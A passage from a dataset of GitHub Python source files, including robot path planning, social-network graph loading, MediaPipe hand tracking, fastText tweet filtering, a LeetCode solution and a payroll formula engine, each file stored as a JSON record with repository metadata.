x_new=x_new[:i+1]\n y_new=y_new[:i+1]\n \n \n x=np.concatenate((x,x_new),axis=0)\n y=np.concatenate((y,y_new),axis=0)\n print (2*sp.pi*R_small*sp.arcsin(0.5*((x_1collision-x_new[-1])**2+(y_1collision-y_new[-1])**2)**0.5/R_small)/sp.pi)\n \n \n\npl.figure(1)\npl.plot(x,y)\ncircle1=pl.Circle((1659,0),radius=R_small,color='r')\ncircle2=pl.Circle((-660,0),radius=R_large,color='r')\nplt.gca().add_patch(circle1)\nplt.gca().add_patch(circle2)\npl.axis('equal')\npl.title(\"Y Distance v.s X Distance\")\npl.xlabel(\"X Distance (m)\")\npl.ylabel(\"Y Distance (m)\")\n\n\n\n\n","repo_name":"HughHuang96824/Computational-Lab-Y1","sub_path":"The Rosetta Mission.py","file_name":"The 
Rosetta Mission.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1558507090","text":"import numpy as np\nfrom utils import get_collision_fn_PR2, load_env, execute_trajectory, draw_sphere_marker\nfrom pybullet_tools.utils import connect, disconnect, wait_if_gui, load_pybullet\n\n\nnp.random.seed(1)\nstate_names = ('x', 'y', 'theta', 'u', 'v', 'w')\nstate_limits = {'x': (-4.75, 4.75), 'y': (-4.75, 4.75), 'theta': (-np.pi, np.pi), 'u': (-0.5, 0.5),\n 'v': (-0.5, 0.5), 'w': (-0.3, 0.3)}\n\ndef dynamics(now_state, inputs):\n # state space(x,y,theta,u,v,w)\n m = 5 # mass\n I = 5 # inertia tensor\n dt = 0.15 # 0.075\n x = now_state[0]\n y = now_state[1]\n theta = now_state[2]\n u = now_state[3]\n v = now_state[4]\n w = now_state[5]\n fx = inputs[0]\n fy = inputs[1]\n ax = fx / m\n ay = fy / m\n alpha = inputs[2] / I\n next_u = u + ax * dt\n next_v = v + ay * dt\n next_w = w + alpha * dt\n u = next_u\n v = next_v\n w = next_w\n next_x = x + (u * np.cos(theta) - v * np.sin(theta)) * dt # in the fixed frame\n next_y = y + (u * np.sin(theta) + v * np.cos(theta)) * dt # in the fixed frame\n next_theta = theta + w * dt # in the fixed frame\n while next_theta < -np.pi:\n next_theta = next_theta + 2 * np.pi\n while next_theta > np.pi:\n next_theta = next_theta - 2 * np.pi\n return (next_x, next_y, next_theta, next_u, next_v, next_w)\n\n\ndef taskspace(config):\n return (config[0], config[1], config[2])\n\n\ndef limit_check(config):\n for i in range(6):\n if (config[i] < state_limits[state_names[i]][0] or config[i] > state_limits[state_names[i]][1]) and i != 2:\n return False\n return True\n\n\ndef distance(now, next):\n distance_temp = 0\n weights = [4, 4, 3, 2, 2, 1]\n for i in range(6):\n if i != 2:\n distance_temp = distance_temp + (weights[i] * abs(next[i] - now[i]) ** 2)\n else:\n distance_temp = distance_temp + (weights[i] * (theta_diff(next[i], now[i])) ** 2)\n return np.sqrt(distance_temp)\n\n\n\n# a and b are angles in radians within [-pi, pi], angle_diff returns the angle difference within [0 , pi][-pi, pi]\ndef theta_diff(t1, t2):\n diff = t1 - t2\n while diff < -np.pi:\n diff = diff + 2 * np.pi\n while diff > np.pi:\n diff = diff - 2 * np.pi\n return abs(diff)\n\n\ndef achieve(config1, config2):\n dx = abs(config2[0] - config1[0])\n dy = abs(config2[1] - config1[1])\n dtheta = theta_diff(config2[2], config1[2])\n du = abs(config2[3] - config1[3])\n dv = abs(config2[4] - config1[4])\n dw = abs(config2[5] - config1[5])\n if (np.sqrt(\n dx ** 2 + dy ** 2) < 0.125) and (dtheta < 0.15) and (np.sqrt(du ** 2 + dv ** 2) < 0.2) and dw < 0.2:\n return True\n return False\n\n\ndef get_rand(goal_config, goal_bias):\n prob = np.random.random(1) # To make probability of picking the goal node instead of the random one.\n if prob <= goal_bias:\n return goal_config\n else:\n q_random = [0, 0, 0, 0, 0, 0]\n for i in range(len(state_limits)):\n temp_low_lim, temp_up_lim = state_limits[state_names[i]]\n q_random[i] = round(temp_low_lim + (temp_up_lim - temp_low_lim) * np.random.random(), 2)\n return (q_random[0], q_random[1], q_random[2], q_random[3], q_random[4], q_random[5])\n\n\ndef get_near(explored_nodes, q_random):\n d_list = []\n for node in explored_nodes:\n d_list.append(distance(node, q_random))\n min_ind = np.argmin(d_list)\n return explored_nodes[min_ind]\n\n\n# TODO: Define primitives\ndef get_new(near, random, num):\n p1 = (1.0, 0.0, 0.0) # Fx\n p2 = (0.0, 0.0, -1.0) # rotate clockwise\n p3 = (0.0, 0.0, 1.0) # rotate counterclockwise\n p4 = (-1.0, 0.0, 0.0) # Fx\n p5 = (0.0, 1.0, 0.0) # Fy\n p6 = (0.0, -1.0, 0.0) # Fy\n p7 = (1.0, 1.0, 0.0) # Fx and 
Fy\n p8 = (1.0, -1.0, 0.0) # Fx and Fy\n p9 = (-1.0, 1.0, 0.0) # Fx and Fy\n p10 = (-1.0, -1.0, 0.0) # Fx and Fy\n p11 = (1.0, 0.0, 1.0) # Fx and rotate\n p12 = (1.0, 0.0, -1.0) # Fx and rotate\n p13 = (-1.0, 0.0, 1.0) # Fx and rotate\n p14 = (-1.0, 0.0, -1.0) # Fx and rotate\n p15 = (0.0, 1.0, 1.0) # rotate and Fy\n p16 = (0.0, 1.0, -1.0) # rotate and Fy\n p17 = (0.0, -1.0, 1.0) # rotate and Fy\n p18 = (0.0, -1.0, -1.0) # rotate and Fy\n primitive = [p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13, p14, p15, p16, p17, p18]\n dist = []\n for i in range(num):\n dist.append(distance(dynamics(near, primitive[i]), random))\n min_id = np.argmin(dist)\n return dynamics(near, primitive[min_id])\n\n\ndef path_quality(ex, p):\n explored_node = len(ex)\n quality_1 = 0\n quality_2 = 0\n r = 0.3*np.sqrt(2)\n node_num = len(p)\n for i in range(node_num-1):\n dist_temp_2 = np.sqrt((p[i+1][0]-p[i][0])**2 + (p[i+1][1]-p[i][1])**2 + r * theta_diff(p[i+1][2], p[i][2]))\n dist_temp_1 = np.sqrt((p[i+1][0]-p[i][0])**2 + (p[i+1][1]-p[i][1])**2)\n quality_1 = quality_1 + dist_temp_1\n quality_2 = quality_2 + dist_temp_2\n return explored_node, node_num, np.sqrt(quality_1), np.sqrt(quality_2)\n\n\n# RRT-Connect\ndef rrt_connect(start_config, goal_config, collision_fn, prim_num):\n path = []\n config_path = []\n #start_time = time.time()\n goal_bias = 0.1 # 10%\n root = -1\n explored = [start_config]\n parent = {} # a dictionary key: tuple(a config), value: tuple(parent's config)\n parent[start_config] = root\n collision_times = 0\n finished = 0\n\n while finished == 0:\n random_finished = 0\n while random_finished == 0:\n random_config = get_rand(goal_config, goal_bias)\n if collision_fn(taskspace(random_config)) == False and limit_check(\n random_config) == True: # hit an obstacle\n random_finished = 1\n near_config = get_near(explored, random_config)\n\n connect_times = 0\n while connect_times < 120: # to prevent the random sample is too far away\n # check if the near node hit obstacle or out of limit\n if collision_fn(taskspace(near_config)) == True or limit_check(near_config) == False:\n collision_times = collision_times + 1\n break # get random node again\n\n if achieve(near_config, random_config): # reach the random sample\n new_config = random_config\n if parent.get(new_config) is None:\n parent[new_config] = near_config\n else:\n break\n explored.append(new_config)\n break # get random node again\n\n else: # have not reached the random sample, then extend!\n # print(\"extend\")\n new_config = get_new(near_config, random_config, prim_num)\n\n if collision_fn(taskspace(new_config)) == True or limit_check(new_config) == False: # hit an obstacle\n collision_times = collision_times + 1\n break # get random node again\n if parent.get(new_config) is None:\n parent[new_config] = near_config\n else:\n break\n explored.append(new_config)\n near_config = new_config # the new node then become the nearest node to the random node.\n connect_times = connect_times + 1\n\n if achieve(near_config, goal_config): # then, we check whether we arrive goal now\n current_config = near_config\n for i in range(len(parent)):\n if parent[current_config] != root:\n path.insert(0, taskspace(current_config))\n config_path.insert(0, current_config)\n current_config = parent[current_config]\n finished = 1\n break\n\n #computetime = time.time() - start_time\n #print(\"Planner run time(without drawing the points): \", computetime, \"sec.\")\n return explored, path, config_path, parent\n\ndef main(screenshot=False):\n # initialize 
PyBullet\n connect(use_gui=False)\n # load robot and obstacle resources\n _, obstacles = load_env('environment.json')\n robot = load_pybullet(\"myrobot.urdf\")\n # define active DoFs\n base_joints = [0, 1, 2]\n collision_fn = get_collision_fn_PR2(robot, base_joints, list(obstacles.values()))\n print()\n print()\n print(\"Building RRT...\")\n print(\"We will show the search trees(blue) and executed path(green) in this program.\")\n print(\"This program is expected to run for 4~10 minutes (incluing drawing paths)...\")\n print()\n start_config = (-4.5, 4.5, 0, 0, 0, 0)\n goal_config = (4.5, -4.5, -np.pi/2, 0, 0, 0)\n #start_time = time.time()\n explored, path, config_path, dictionary = rrt_connect(start_config, goal_config, collision_fn, 18)\n totalnodes, nodenum, quality_eu, quality_plus = path_quality(explored, path)\n print(\"Finish building the RRT!!\")\n #print(\"computation time:\", time.time() - start_time)\n print(\"number of explored nodes:\", totalnodes)\n print(\"number of path nodes:\", nodenum)\n print(\"path quality(euclidean):\", quality_eu)\n print(\"path quality(consider theta):\", quality_plus)\n\n disconnect()\n connect(use_gui=True)\n _, obstacles = load_env('environment.json')\n robot = load_pybullet(\"myrobot.urdf\")\n start_config = (-4.5, 4.5, 0)\n collision_fn(start_config)\n draw_sphere_marker((goal_config[0], goal_config[1], 0.1), 0.15, (1, 0, 0, 1))\n print(\"Start drawing the explored path (Blue)\")\n for path_i in explored:\n draw_sphere_marker((path_i[0], path_i[1], 0.06), 0.05, (0, 0, 1, 1))\n print(\"Start drawing the path (green)\")\n for path_i in path:\n draw_sphere_marker((path_i[0], path_i[1], 0.08), 0.05, (0, 1, 0, 1))\n\n ######################\n print(\"Start executing the path\")\n # Execute planned path\n execute_trajectory(robot, base_joints, path, sleep=0.1)\n # Keep graphics window opened\n wait_if_gui()\n disconnect()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yanglunlai/Kinodynamic-RRT-Path-Planning","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":9981,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"70874414941","text":"import matplotlib.pyplot as plt\nimport networkx as nx\nimport operator\nimport inspect\nimport random\nimport sys\nimport os\n\ngraphPath = {\"twitter\":\"networks/twitter/\", \"karate\":\"networks/karate/\"}\n \ndef calculateStatistics(myGraph, name):\n\t\n\ttmp_path = graphPath[name] + \"statistics.txt\"\n\tinfoFile = open(tmp_path, 'w')\n\n\ttotal_number_of_nodes = myGraph.number_of_nodes()\n\tinfoFile.write(\"Nodes \" + str(total_number_of_nodes) + \"\\n\")\n\n\ttotal_number_of_edges = myGraph.number_of_edges()\n\tinfoFile.write(\"Edges: \" + str(total_number_of_edges) + \"\\n\")\n\n\t#pr_directed = nx.pagerank(myGraph, alpha = 0.9)\n\t#pr_directed_sorted = sorted(pr_directed.items(), key = operator.itemgetter(1))[::-1]\n\n\tinfoFile.close()\n\ndef displayGraph(myGraph, path):\n\t#display a subgraph\n\tnodes = myGraph.nodes()\n\ttmp_nodes = random.sample(nodes, 10)\n\tH = myGraph.subgraph(tmp_nodes)\n\tnx.draw(H, pos=nx.spring_layout(H), node_size=2)\n\n\t# tmp_title = path.replace(\"/\", \"\").upper()\n\tplt.show()\n\n\ndef returnTheFolder(path):\n\tif(\"txt\" in path):\n\t\ttmp_path = path.replace(\"dataset.txt\", \"\")\n\telif(\"gml\" in path):\n\t\ttmp_path = path.replace(\"dataset.gml\", \"\")\n\telif(\"mtx\" in path):\n\t\ttmp_path = path.replace(\"dataset.mtx\", \"\")\n\telif(\"csv\" in path):\n\t\ttmp_path = path.replace(\"dataset.csv\", \"\")\n\treturn(tmp_path)\n\ndef readEdgelistFile(path):\n\tgraph_X = nx.read_edgelist(path, nodetype = int, create_using = nx.DiGraph())\n\t\n\treturn(graph_X)\n\ndef createEdgelistFile(path):\n\tgraph_X = nx.DiGraph()\n\tmyFile = open(path)\n\tfor line in myFile:\n\t\ttry:\n\t\t\ttmp_line = line.replace(\"\\n\", \"\").split(\" \")\n\t\t\tsource = int(tmp_line[0])\n\t\t\ttarget = int(tmp_line[1])\n\t\t\tgraph_X.add_edge(source, target)\n\t\texcept:\n\t\t\tprint(\"error\")\n\n\tmyFile.close()\n\n\t'''Write edgelist file'''\n\tnx.write_edgelist(graph_X, returnTheFolder(path) + \"edgelist\")\n\n\treturn(graph_X)\n\ndef returnTheLargestCC(graph):\n\tlargest_cc = max(nx.strongly_connected_component_subgraphs(graph), key=len)\n\treturn(largest_cc)\n\ndef returnGraph(name):\n\ttmp_network_name = graphPath[name] + \"edgelist\"\n\tif(os.path.isfile(tmp_network_name)):\n\t\t''' Read the edgelist file'''\n\t\tgraph_X = readEdgelistFile(graphPath[name] + \"edgelist\")\n\telse:\n\t\t''' Create the edgelist file'''\n\t\tcreateEdgelistFile(graphPath[name] + \"dataset.txt\")\n\t\tgraph_X = readEdgelistFile(graphPath[name] + \"edgelist\")\n\t\n\t''' Return the largest strongly connected component network'''\n\tif(not(name == \"karate\")):\n\t\tgraph_X = returnTheLargestCC(graph_X)\n\treturn(graph_X)\n","repo_name":"cterizi/Modeling-Aggression-Propagation-on-Social-Media","sub_path":"CODE/readGraph.py","file_name":"readGraph.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72675708705","text":"\"\"\"IPX800 Analog Input.\"\"\"\nfrom .ipx800 import IPX800\n\n\nclass AInput:\n \"\"\"Representing an IPX800 Analog Input.\"\"\"\n\n def __init__(self, ipx800: IPX800, analog_id: int) -> None:\n \"\"\"Initialize object.\"\"\"\n self._ipx = ipx800\n self.id = analog_id\n\n @property\n def key(self) -> str:\n \"\"\"Return the key to get the value from API call.\"\"\"\n return f\"A{self.id}\"\n\n @property\n async def value(self) -> float:\n \"\"\"Get Analog Input value.\"\"\"\n params = {\"Get\": \"A\"}\n response = await self._ipx.request_api(params)\n return response[self.key]\n","repo_name":"Aohzan/pypx800","sub_path":"pypx800/ainput.py","file_name":"ainput.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"32145337792","text":"# list of animals\nanimals = ['bear', 'tiger', 'penguin', 'zebra']\nbear = animals[0]\n\nanimals2 = ['bear', 'python', 'peacock', 'kangaroo', 'whale', 'platypus']\n\n\n #The animal at 1. python\n #The 3rd animal. peacock\n #The 1st animal. bear\n #The animal at 3. kangaroo\n #The 5th animal. whale\n #The animal at 2. peacock\n #The 6th animal. platypus\n #The animal at 4. whale\n","repo_name":"rjcmarkelz/python_the_hard_way","sub_path":"exercises/ex34.py","file_name":"ex34.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4054907794","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport six\n\nimport argparse\nfrom cmd import Cmd\nfrom ModelKB import Model\n\n\ndef unicode_text(s):\n if type(s) != six.text_type:\n return s.decode('utf-8')\n return s\n\nclass SeeModelCmd(Cmd):\n def __init__(self, model):\n Cmd.__init__(self)\n self.model = model\n self.k = 20\n\n def do_help(self, arg):\n print(\" Command list:\")\n print(\"\\trole ROLE\\tInspect role matrix\")\n print(\"\\tcalc EXPR\\tCalculate vector\")\n print(\"\\tset K \\tDisplay the top K results (default: 20)\")\n print(\"\\tquit \\tQuit\")\n print()\n\n def do_role(self, role):\n try:\n self.model.show_m(unicode_text(role), self.k)\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_comprole(self, comprole):\n try:\n r1, r2 = unicode_text(comprole).split(' ')\n self.model.show_mm(r1, r2, self.k)\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_calc(self, expr):\n try:\n self.model.show_v(self.model.calc(unicode_text(expr)), self.k)\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_sim(self, s):\n try:\n x, y = unicode_text(s).split(' ~ ')\n print(self.model.calc(x).dot(self.model.calc(y)))\n except Exception as ex:\n template = \"An exception of type {0} occurred. Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n print()\n\n def do_set(self, k):\n self.k = int(k)\n\n def do_quit(self, arg):\n raise SystemExit\n\n\ndef main():\n parser = argparse.ArgumentParser(description='See KB embedding model.')\n parser.add_argument('words_file', metavar='VOCAB_ENTITY', type=str,\n help='counts of entities')\n parser.add_argument('roles_file', metavar='VOCAB_RELATION', type=str,\n help='counts of relations')\n parser.add_argument('model_path', metavar='MODEL_PATH', type=str,\n help='path to trained model')\n args = parser.parse_args()\n\n model = Model(args.words_file, args.roles_file, args.model_path)\n\n prompt = SeeModelCmd(model)\n prompt.prompt = '> '\n prompt.cmdloop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tianran/glimvec","sub_path":"python/seeModelKB.py","file_name":"seeModelKB.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"70"}
+{"seq_id":"28159486783","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom statsmodels.tsa.arima.model import ARIMA\r\n\r\n# Load CSV file\r\ndata = pd.read_csv(\"applerevenue .csv\", index_col=0, parse_dates=True)\r\n\r\n# Plot revenue data\r\ndata.plot()\r\nplt.show()\r\n\r\n# Fit ARIMA model\r\nmodel = ARIMA(data, order=(1, 1, 1))\r\nmodel_fit = model.fit()\r\n\r\n# Make predictions\r\nstart = len(data)\r\nend = len(data) + 10\r\npredictions = model_fit.predict(start=start, end=end, typ='levels')\r\n\r\n# Plot predictions\r\npredictions.plot()\r\nplt.show()\r\n","repo_name":"tmop14/Apple-Revenue-Next-10-Years","sub_path":"test apple rev.py","file_name":"test apple rev.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"39050169666","text":"import fasttext\nimport pickle\nimport pandas as pd\n\n#df_old=pd.read_pickle(\"./covid-tweets-filtered.pkl\")\ndf_old=pd.read_pickle(\"./covid-tweets-ids.pkl\")\nlang_model = fasttext.load_model(\"./lid.176.ftz\")\nlangs = []\ncount=0; \n\ndf_new = pd.DataFrame({'tweet': [], 'tweetid': [], 'timestamp': [], 'lang': [], 'user': []})\n\nfor index, row in df_old.iterrows():\n if (count % 25000 == 0):\n print(count)\n #print(count)\n row['tweet']=row['tweet'].replace('\\n','')\n #print(row['tweet'])\n lang = lang_model.predict(row['tweet'])\n twitter_lang = \"('__label__\" + row['lang'] + \"',)\"\n if (str(lang[0]) == twitter_lang): \n df_new.loc[count]=[row['tweet'], row['tweetid'], row['timestamp'], row['lang'], row['user']]\n count+=1; \n\nprint(count)\ndf_new.to_pickle(\"./covid-tweets-ids-fastext.pkl\")\nprint(df_new.head())\n#print(lang_model.predict(\"Incapaz de distinguir la luna y la cara de esta chica,Las estrellas se ponen nerviosas en el cielo.\")[0])\n","repo_name":"AlexanderTekle/script-tweets","sub_path":"fastText.py","file_name":"fastText.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71577392546","text":"# coding: utf8\nimport json\nfrom urlparse import urljoin\n\n\nclass Asset(object):\n \"\"\"Asset management\"\"\"\n def __init__(self, path, host=None, debug=False):\n self.path = path\n self._stats = {}\n self.host = host\n self.debug = debug\n\n @property\n def stats(self):\n _stats = self._stats\n if not _stats:\n with open(self.path) as f:\n _stats = json.loads(f.read())\n\n if not self.debug:\n self._stats = _stats\n return _stats\n\n def get(self, name):\n if not self.host:\n return self.stats.get(name, '')\n return urljoin(self.host, self.stats.get(name, ''))\n","repo_name":"gfreezy/pushpin","sub_path":"pushpin/views/libs/asset.py","file_name":"asset.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10961095518","text":"#importing the required modules\n\nimport cv2\nimport time #to check the frame rate\nimport mediapipe as mp\n\n#Creating the video object\ncap = cv2.VideoCapture(0)\n\n#A formality to before using this module\nmpHands = mp.solutions.hands\n\n#Creating object called Hands\nhands = mpHands.Hands()\n\n#Module used for drawing lines between the landmarks\nmpDraw = mp.solutions.drawing_utils\n\n#Tracking prev and current time for tracking fps\npTime = 0\ncTime = 0\n\n\nwhile True:\n\n success, img = cap.read()\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #Converting the channel of the img from BGR to RGB\n results = hands.process(imgRGB)\n\n #Checking if something is detected or not\n print(results.multi_hand_landmarks)\n\n #Extracting landmarks of multiple hands if present\n if results.multi_hand_landmarks:\n for handlms in results.multi_hand_landmarks:\n for id, lm in enumerate(handlms.landmark):\n\n #print(id, lm)\n h, w, c = img.shape # height, weidth, channel of the img\n cx, cy = int(lm.x * w), int(lm.y * h) # finding the positions in pixel instead of ratios\n print(id, cx, cy)\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED) # Drawing the circle\n\n # we are using img not imgRGB because we are displaying BGR image\n mpDraw.draw_landmarks(img, handlms, mpHands.HAND_CONNECTIONS) # `mpHands.HAND_CONNECTIONS` : draws the connections\n\n\n cTime = time.time() # Gives us the current time\n fps = 1/(cTime - pTime)\n pTime = cTime\n\n #Displaying on the screen\n cv2.putText(img, str(int(fps)), (10, 70),\n cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 3)\n\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)","repo_name":"yashgosa/hand_tracking","sub_path":"hand_tracking_minimum.py","file_name":"hand_tracking_minimum.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"12242754003","text":"'''\nA binary matrix means that all elements are 0 or 1. For each individual row of the matrix,\nthis row is sorted in non-decreasing order.\nGiven a row-sorted binary matrix binaryMatrix, return leftmost column index(0-indexed) with at least a 1 in it.\nIf such index doesn't exist, return -1.\nYou can't access the Binary Matrix directly. You may only access the matrix using a BinaryMatrix interface:\n- BinaryMatrix.get(row, col) returns the element of the matrix at index (row, col) (0-indexed).\n- BinaryMatrix.dimensions() returns a list of 2 elements [rows, cols], which means the matrix is rows * cols.\n\nSubmissions making more than 1000 calls to BinaryMatrix.get will be judged Wrong Answer.\nAlso, any solutions that attempt to circumvent the judge will result in disqualification.\n'''\nfrom leetcode import *\n\n# This is for testing purposes only!!\nclass BinaryMatrix:\n def __init__(self, mat):\n self.mat = mat\n def get(self, row: int, col: int) -> int:\n return self.mat[row][col]\n def dimensions(self) -> List[int]:\n return [len(self.mat), len(self.mat[0])]\n\n# Time: O(rows * log(cols)), Space: O(1).\ndef leftmost_column_with_one(binaryMatrix: 'BinaryMatrix') -> int:\n rows, cols = binaryMatrix.dimensions()\n min_one_col_ind = cols\n for i in range(rows):\n # Perform binary search on the row to find the first 1:\n start = 0\n end = cols - 1\n one_col_ind = -1\n while start <= end:\n mid = (start + end) // 2\n # Go to the right to see if there is a 1 to the right:\n if binaryMatrix.get(i, mid) == 0:\n start = mid + 1\n # Go to the left to see if there is a 1 that's closer to the left:\n else:\n one_col_ind = mid\n end = mid - 1\n\n if one_col_ind != -1:\n if one_col_ind == 0:\n return 0\n elif one_col_ind < min_one_col_ind:\n min_one_col_ind = one_col_ind\n return -1 if (min_one_col_ind == cols) else min_one_col_ind\n\n# This is a much smarter algorithm that runs in O(rows + cols) time and still has O(1) space complexity.\n# This was from a Leetcode hint.\ndef leftmost_column_with_one_v2(binaryMatrix: 'BinaryMatrix') -> int:\n rows, cols = binaryMatrix.dimensions()\n ind = [0, cols - 1]\n min_one_col_ind = cols\n while (ind[0] < rows) and (ind[1] >= 0):\n if binaryMatrix.get(ind[0], ind[1]) == 1:\n min_one_col_ind = ind[1]\n ind[1] -= 1\n else:\n ind[0] += 1\n return -1 if (min_one_col_ind == cols) else min_one_col_ind\n\n# Expected: 0\nprint(leftmost_column_with_one(BinaryMatrix([[0,0],[1,1]])))\n# Expected: 1\nprint(leftmost_column_with_one(BinaryMatrix([[0,0],[0,1]])))\n# Expected: -1\nprint(leftmost_column_with_one(BinaryMatrix([[0,0],[0,0]])))\n# Expected: 1\nprint(leftmost_column_with_one(BinaryMatrix([[0,0,0,1],[0,0,1,1],[0,1,1,1]])))\n\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0],[1,1]])))\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0],[0,1]])))\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0],[0,0]])))\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0,0,1],[0,0,1,1],[0,1,1,1]])))\n","repo_name":"abespitalny/CodingPuzzles","sub_path":"Leetcode/leftmost_column_with_at_least_a_one.py","file_name":"leftmost_column_with_at_least_a_one.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33310761459","text":"# coding:utf-8\n\nfrom ..pysysutils import global_variables as gv\nfrom copy import deepcopy\nfrom sqlalchemy import select\nfrom sqlalchemy import text\nfrom decimal import Decimal\nfrom ..pyfunctions import *\nfrom ..pyfunctions import __all__ as func_list\nfrom ..pysysutils.py_calc_log import log\nfrom datetime import timedelta, date\n\none_day = timedelta(days=1)\n\n\n# 根据系统ID和公式ID获取一个实例化的公式\ndef select_formula(tenant_id, formula_id):\n \"\"\"根据系统ID和公式ID在数据库中查找出对应公式的配置数据,并实例化\"\"\"\n\n # 基类的字符串,根据数据动态生成公式对象\n class_string_m = \"\"\"\nclass FormulaObject():\n\n def __init__(self):\n # 租户ID\n self.tenant_id = ''\n # 公式唯一id\n self.id = ''\n # 公式所属国家ALL:所有国家 CHN:中国\n self.country = ''\n # 公式描述,用于系统中的描述\n self.desc = ''\n # 公式英文描述,用于系统中的描述\n self.descENG = ''\n # 公式使用中文说明\n self.instructions = ''\n # 公式使用英文说明\n self.instructionsENG = ''\n # 用户编写的原始代码\n self.cus_code_string = ''\n \n @log()\n def formula_exec(self):\n var = gv.get_variable_dic()\n pin_dic = gv.get_pin_dic()\n pin_acc_dic = gv.get_pin_acc_dic()\n # print('current formula id:' + self.id)\n %1\n\nclass_meta=FormulaObject()\n \"\"\"\n\n db = gv.get_db()\n t = db.get_table('hhr_py_formula', schema_name='boogoo_payroll')\n\n stmt = select([t.c.tenant_id, t.c.hhr_formula_id, t.c.hhr_country, t.c.hhr_description, t.c.hhr_cum_code],\n (t.c.tenant_id == tenant_id) & (t.c.hhr_formula_id == formula_id))\n\n result = db.conn.execute(stmt).fetchone()\n\n if result is not None:\n cus_code_str = result['hhr_cum_code']\n cus_code_str = cus_code_str.replace('\\n', '\\n ')\n cus_code_str = cus_code_str.replace('\\t', ' ')\n class_string = class_string_m.replace('%1', trans_cus_code(cus_code_str))\n _locals = locals()\n exec(class_string, globals(), _locals)\n formula_class = _locals['class_meta']\n formula_class.tenant_id = result['tenant_id']\n formula_class.id = result['hhr_formula_id']\n formula_class.country = result['hhr_country']\n formula_class.desc = result['hhr_description']\n formula_class.cus_code_string = result['hhr_cum_code']\n formula_class.function_list = list()\n formula_class.variable_list = list()\n formula_class.pin_list = list()\n formula_class.pin_acc_list = list()\n\n log_flag = gv.get_run_var_value('LOG_FLAG')\n if log_flag == 'Y':\n formula_class.trace_dic = {\n 'id': formula_class.id,\n 'desc': formula_class.desc,\n 'type': 'FM',\n 'fm_obj': formula_class\n }\n else:\n formula_class.trace_dic = {}\n\n add_lists(formula_class)\n return formula_class\n else:\n pass\n\n\ndef validate_pins(formula_class):\n \"\"\"\n 校验公式包含的所有薪资项目是否都在员工的使用范围和通用薪资项目中\n :param formula_class:公式对象\n :return:\n \"\"\"\n try:\n pin_dic = gv.get_pin_dic()\n for pin_id in formula_class.pin_list:\n if pin_id not in pin_dic:\n raise Exception(\"薪资项目\" + pin_id + \",不在适用范围\")\n except Exception:\n raise\n\n\ndef add_lists(formula_class):\n \"\"\"\n 给公式对象添加function_list,variable_list,pin_list。\n :param formula_class:公式对象\n :return:\n \"\"\"\n sql = text(\"select hhr_fvp_id,hhr_fvp_type from boogoo_payroll.hhr_py_formula_fvp_list a where tenant_id=:b1 and hhr_formula_id=:b2\")\n\n result = gv.get_db().conn.execute(sql, b1=formula_class.tenant_id, b2=formula_class.id).fetchall()\n if result is not None:\n for result_line in result:\n if result_line['hhr_fvp_type'] == 'FC':\n formula_class.function_list.append(result_line['hhr_fvp_id'])\n elif result_line['hhr_fvp_type'] == 'VR':\n formula_class.variable_list.append(result_line['hhr_fvp_id'])\n elif result_line['hhr_fvp_type'] == 'WT':\n 
